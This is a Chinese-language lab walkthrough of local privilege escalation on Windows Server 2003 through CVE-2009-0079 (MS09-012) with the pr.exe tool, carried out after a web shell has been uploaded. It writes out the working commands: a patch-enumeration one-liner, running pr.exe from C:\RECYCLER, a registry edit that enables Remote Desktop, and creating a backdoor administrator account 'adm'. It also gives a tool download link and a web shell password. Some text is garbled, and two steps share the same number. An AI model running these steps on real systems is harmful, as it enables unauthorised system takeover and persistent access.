【内网提权】windows2003本地PR提权详解

提权利用的漏洞

Microsoft Windows RPCSS服务隔离本地权限提升漏洞

RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程，本地攻击者可以利用令牌劫持的方式获得权限提升。成功利用此漏洞的攻击者可以完全控制受影响的系统，攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。

BUGTRAQ  ID: 34443
CVE(CAN) ID: CVE-2009-0079

发布日期：2009-04-14
更新日期：2009-04-24

受影响系统：
Microsoft Windows XP x64 SP2
Microsoft Windows XP x64
Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 SP1

也就是说只有Windows Server 2003和windows xp系统能够使用 pr 提权。

---

PR提权

声明：以下的提权的介绍只适用于学习和授权情况下的操作，请勿用于非法环境！

  以下环境：Windows Server 2003

很多时候，当我们上传了一句话木马之后，想要进行一些操作。比如，查看当前用户的身份，这时会发现权限不够，当前的命令行只对网站当前目录下的文件具有操作权限，对其他目录和系统都没有权限，这时我们就需要提权了。

我们把下面pr.exe程序上传到网站目录下去
工具下载：

链接：https://pan.baidu.com/s/1Z_2Up5i9ONs9nIfLtDeogQ
提取码：xw2g
登陆大马密码：xiaowang520

实验环境：

攻击(攻击者)机：	windows2010 物理机
目标(受害者)主机：	windows2003    虚拟机	NAT	192.168.254.130

---

【步骤一】上传（这里是直接复制进行的，构建环境）大马到目标网页主目录，并在物理机上进行登陆，结果如【图1】所示：

图1

【步骤二】用户权限查询，结果如【图2】所示：

【命令】

whoami  //用户权限查询

图2

【分析】当前系统为network用户，未取得系统system权限，需进行提权

【步骤三】查看系统版本及补丁情况，根据补丁情况进行提权，结果如【图3】所示：

【命令】

systeminfo  //查看系统版本及补丁情况

图3

【分析】没有进行补丁，可以利用漏洞进行提权

【步骤四】查询系统进行以下补丁与否，可以利用相应的没有朝廷实木2漏洞进行提权，结果如【图4】所示：

【命令】适用于window2003

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\temp.txt

图4

【分析】KB952004 Not Installed!未进行补丁，可以利用MS09-012漏洞其进行提权

 

【步骤五】上传pr.exe到可上传目录下 C:\RECYCLER\ 进行提权【可能会因为刚搭建的环境，没有用过回收站，导致直接在C盘找不到该目录，可以往回收站里面放入文件，就可以找到了】结果如【图5】所示：

图5

【步骤六】查看提权结果，结果如【图6】所示：

【命令】

C:\RECYCLER\pr.exe "whoami" //查看提权结果

图6

【分析】显示为system,说明提权成功

【步骤七】确认远程桌面是否开启对应的3389端口，结果如【图7】所示：

【命令】

/c C:\RECYCLER\pr.exe "netstat -ano" //确认远程桌面是否开启对应的端口

图7

【分析】没有开启3389端口，需要开启3389端口

【步骤八】：开启3389端口，复制下面代码，创建一个*.bat的文件，上传到C:\RECYCLER\ 目录下，结果如【图8】所示：

【命令】

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\RECYCLER\pr.exe  "C:\RECYCLER\1.bat"

图8

【分析】3389端口已打开，可以进行远程桌面连接

【步骤九】  进行提权，创建一个加入管理员组的用户，结果如【图9】所示：

【命令】

C:\RECYCLER\pr.exe  "net user adm  123456 /add"

C:\RECYCLER\pr.exe  "net localgroup administrators adm /add"

【步骤九】  连接远程桌面，结果如【图9】所示：

【命令】

mstsc

图7

【分析】远程桌面连接成功